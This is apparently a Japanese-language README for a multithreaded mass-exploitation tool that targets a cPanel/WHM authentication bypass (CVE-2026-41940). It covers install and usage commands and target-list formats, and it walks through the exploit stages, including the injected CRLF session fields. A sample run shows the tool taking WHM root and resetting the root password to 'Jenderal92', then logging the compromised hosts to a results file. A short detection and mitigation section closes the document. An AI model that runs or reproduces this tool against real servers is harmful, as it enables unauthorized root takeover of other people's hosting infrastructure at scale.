
cPanel/WHM 上の CVE-2026-41940 を標的としたバルクスキャナー兼一括エクスプロイトツール。自動化されたターゲット検証と高速マルチスレッド実行のために設計されています。
CVE-2026-41940 は、WHM/cPanel における重大な認証バイパス脆弱性であり、攻撃者が有効な認証情報なしで認証をバイパスし、サーバーの root アクセスを取得することを可能にします。この脆弱性は、セッション処理メカニズムにおける CRLF インジェクションを悪用して、悪意のあるセッションパラメータを注入します。
このツールは、複数のターゲットを同時にテストするためのマルチスレッド対応の一括エクスプロイト機能を提供し、インテリジェントな成功検出と無効なターゲットの自動フィルタリングを備えています。
| 機能 | 説明 |
|---|---|
| ✅ 一括エクスプロイト | リストファイルから複数のターゲットをスキャンして悪用 |
| 🚀 マルチスレッド | 高速スキャンのためのスレッド数設定(デフォルト: 15) |
| 🔐 自動パスワード変更 | 悪用成功時に root パスワードを Jenderal92 に変更 |
| 🛡️ スマートな成功検出 | さまざまな WHM API レスポンス形式を自動検出 |
| ⚠️ ライセンスエラーフィルタリング | ライセンスエラー(無効/読み取り不可)のあるターゲットを除外 |
| 📝 構造化出力 | 確認済みの成功のみを `domain:port |
| 🛡️ SSL/TLS サポート | 自己署名証明書を自動処理 |
| 🔄 セッション管理 | セッション抽出、Cookie インジェクション、トークン処理を自動化 |
| ⏱️ タイムアウト制御 | 接続タイムアウトの設定可能(デフォルト: 15 秒) |
| 🔍 事前接続チェック | 悪用試行前にポートの利用可能性を確認 |
| 📊 リアルタイム進行状況 | 各悪用段階の詳細な進行状況を表示 |
pip install requests urllib3 futures
または requirements.txt を使用:
requests==2.27.1
urllib3==1.26.18
futures==3.4.0
# Clone repository
git clone https://github.com/Jenderal92/CVE-2026-41940.git
cd CVE-2026-41940
# Install dependencies
pip install -r requirements.txt
# Make executable (Linux/Mac)
chmod +x CVE-2026-41940.py
1行に1つのターゲットを指定した targets.txt ファイルを作成します:
https://target1.com:2087
target2.com
127.0.0.1:2087
http://target3.com:2087
target4.com
注記: ポート
2087は WHM のデフォルトポートです。指定しない場合は自動的にポート 2087 が使用されます。HTTP/HTTPS プレフィックスが欠落している場合は自動的に追加されます。
python2 CVE-2026-41940.py targets.txt
# Use 5 concurrent threads
python2 CVE-2026-41940.py targets.txt --threads 5
# Use 20 threads for faster scanning
python2 CVE-2026-41940.py targets.txt --threads 20
# Override Host header for all targets
python2 CVE-2026-41940.py targets.txt --hostname custom.host.com --threads 10
# Set timeout to 30 seconds for slow connections
python2 CVE-2026-41940.py targets.txt --threads 10 --timeout 30
| 引数 | 説明 | デフォルト | 必須 |
|---|---|---|---|
list_file | ターゲットリストを含むファイル(1行に1つ) | - | ✅ はい |
--threads | 同時実行スレッド数 | 15 | ❌ いいえ |
--hostname | すべてのターゲットの Host ヘッダーを上書き | 自動検出 | ❌ いいえ |
--timeout | 接続タイムアウト(秒) | 15 | ❌ いいえ |
res.txt)確認済みの悪用成功のみが保存されます。ライセンスエラー、パスワード変更失敗、接続問題のあるターゲットは自動的に除外されます。
形式:
domain:port|root|Jenderal92
出力例:
www.example.com:2087|root|Jenderal92
127.0.0.1:2087|root|Jenderal92
target.example.net:2087|root|Jenderal92
以下のターゲットは res.txt に保存されません:
Cannot Read License File)$ python2 CVE-2026-41940.py targets.txt --threads 10
CVE-2026-41940 bypass authentication - Mass Exploit
[*] Loaded 4 targets
[*] Starting exploit with 10 threads...
[*] Timeout: 15 seconds
[*] Note: http:// will be added automatically if missing
[*] ONLY targets with confirmed password changes will be saved to res.txt
[*] Targets with license errors, connection issues, or failed password changes will be EXCLUDED
==================================================
[*] Checking target: 127.0.0.1
Original input: 127.0.0.1
Normalized: https://127.0.0.1:2087
Port 2087: OPEN
Testing connection... OK (HTTP 200)
[0] hostname = example.com
[1] minting a preauth session...
session base = :d5nPe99Nx9HQdMu2
[2] sending the CRLF injection...
HTTP 307, leaked token = /cpsess0488087910
[3] firing do_token_denied to propagate...
HTTP 401, gadget fired
[4] verifying we're WHM root...
/json-api/version -> HTTP 200 {"version":"11.118.0.13"}
[*] attempting to change the root password
passwd -> HTTP 200
{
"data": {
"app": ["system"]
},
"metadata": {
"output": {
"raw": "Password for \"root\" has been changed."
},
"reason": "Password changed for user \"root\".",
"version": 1,
"command": "passwd",
"result": 1
}
}
[+] Password change confirmed (metadata.result=1)
[+] ✓ Root password successfully changed to 'Jenderal92'!
[✓] SUCCESS & SAVED: 127.0.0.1:2087
Saved to res.txt: 127.0.0.1:2087|root|Jenderal92
==================================================
[*] Scan complete!
[*] Targets with successfully changed passwords: 1 out of 4
[+] Results saved to res.txt
Successfully exploited targets (password changed to Jenderal92):
✓ 127.0.0.1:2087
エクスプロイトは、インテリジェントな検証を備えた4つの主要ステージで構成されています:
[1] minting a preauth session...
/login/?login_only=1 に送信whostmgrsession Cookie を取得,<obhex> 部分を削除してセッションベースを抽出[2] sending the CRLF injection...
Authorization: Basic ヘッダー付きの GET リクエストを送信root:x
successful_internal_auth_with_timestamp=9999999999
user=root
tfa_verified=1
hasroot=1
\r\n)文字が偽のセッションパラメータを注入cp_security_token を含む Location ヘッダーとともに HTTP 307 で応答[3] firing do_token_denied to propagate...
/scripts2/listaccts エンドポイントにアクセスdo_token_denied メカニズムをトリガー[4] verifying we're WHM root...
/json-api/version にアクセス/json-api/passwd API を呼び出して root パスワードを Jenderal92 に変更{"metadata": {"result": 1}}(cPanel v11.118+){"status": 1}(旧バージョン){"result": [{"status": 1}]}(レガシー形式)このツールは以下を自動的に除外します:
{"status": 0, "statusmsg": "Cannot Read License File"}| 指標 | 説明 |
|---|---|
異常な whostmgrsession Cookie | 適切な認証なしの異常な Cookie パターン |
| ヘッダー内の CRLF 文字 | HTTP ヘッダー内の \r\n シーケンスの検出 |
/scripts2/listaccts へのアクセス | このパスへの不正アクセス |
パスワード Jenderal92 | この特定のパスワードを使用したログイン成功 |
cpsess トークンの漏えい | Location ヘッダーに表示されるセキュリティトークン |
| ログイン失敗後の成功 | 誤ったパスワードで /login/?login_only=1 に POST した後、特権アクセス |
# WHM access log
/usr/local/cpanel/logs/access_log
# cPanel error log
/usr/local/cpanel/logs/error_log
# Authentication log
/var/log/secure
# System messages
/var/log/messages
WHM/cPanel を直ちに最新のパッチ適用版に更新
/usr/local/cpanel/scripts/upcp
すべてのアカウント、特に root で二要素認証(2FA)を有効化
WHM → Security Center → Two-Factor Authentication
IP ホワイトリストでWHM アクセスを制限
WHM → Security Center → Host Access Control
不審なパターンがないかアクセスログを定期的に監視
tail -f /usr/local/cpanel/logs/access_log | grep -E "(listaccts|passwd|login_only)"
侵害が疑われる場合はすべてのパスワードを変更
ファイアウォールルールを使用してポート 2087 へのアクセスを制限
# Allow only trusted IPs
iptables -A INPUT -p tcp --dport 2087 -s YOUR_TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 2087 -j DROP
# Or use CSF/LFD firewall
csf -a YOUR_TRUSTED_IP
CRLF インジェクションの試みを検出するWAF ルールを実装
WHM/cPanel インストールの定期的なセキュリティ監査